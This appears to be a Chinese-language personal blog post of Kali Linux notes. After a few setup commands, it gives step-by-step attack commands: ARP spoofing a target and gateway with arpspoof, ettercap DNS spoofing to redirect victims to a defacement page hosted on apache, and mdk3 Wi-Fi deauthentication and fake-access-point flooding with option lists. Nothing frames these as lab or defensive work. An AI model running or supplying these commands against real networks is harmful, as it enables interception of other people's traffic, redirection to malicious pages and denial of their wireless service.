网站首页 Kali BT渗透

kali 折腾记录

发布时间:2016-11-28 16:26 Monday编辑:admin阅读(1350)

    ssh:/etc/init.d/ssh start #start ssh then logout 开启SSH

    leafpad /etc/apt/source.list //修改kali 更新源


    apt-get update //更新
    apt-get dist-upgrade //安装更新

    apt-get install fcitx fcitx-googlepinyin //安装中文输入法


    nmap -sP 192.168.0.0/24 //查找网段类存活主机

    echo 1 >/proc/sys/net/ipv4/ip_forward

    arpspoof -i etho -i 192.168.1.100 192.168.1.1 //第一个IP是目标IP 第二个是网关IP

    修改ettercap DNS文件。
    文件目录:/etc/ettercap/etter.dns
    用记事本打开它。
    ctrl+f 搜索
    关键字:# redirect it to http://www.linux.org

    在终端输入/etc/init.d/apache2 start 
    来启动apache2 也就是网页服务器
    apache2的根目录是/var/www 修改一下index.html 改成黑页

    在终端输入ettercap -G来进入ettercap的图形界面

    //无线wifi相关

    Image [1].png

    airmon-ng start wlan0 
    airodump-ng mon0 //获取wifi

    //无线攻击 mdk3

    mdk3 mon0 d
          -w <filename>             #白名单mac地址列表文件
          -b <filename>              #黑名单mac地址列表文件
          -s <pps>                        #速率,这个模式下默认无限制
          -c [chan,chan,chan,...]                  #信道,可以多填,如 2,4,5,1


    方法三:伪造AP
    产生大量死亡SSID来充斥无线客户端的无线列表,扰乱用户;还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。感觉鸡肋
    mdk3 mon0 b
          -n <ssid>        #自定义ESSID
          -f <filename>            #读取ESSID列表文件
          -v <filename>           #自定义ESSID和BSSID对应列表文件
          -d       #自定义为Ad-Hoc模式
          -w         #自定义为wep模式
         -g        #54Mbit模式
         -t   # WPA TKIP encryption
         -a #WPA AES encryption
          -m #读取数据库的mac地址
          -c <chan> #自定义信道
          -s <pps> #发包速率
    mdk3 –help b #查看详细内容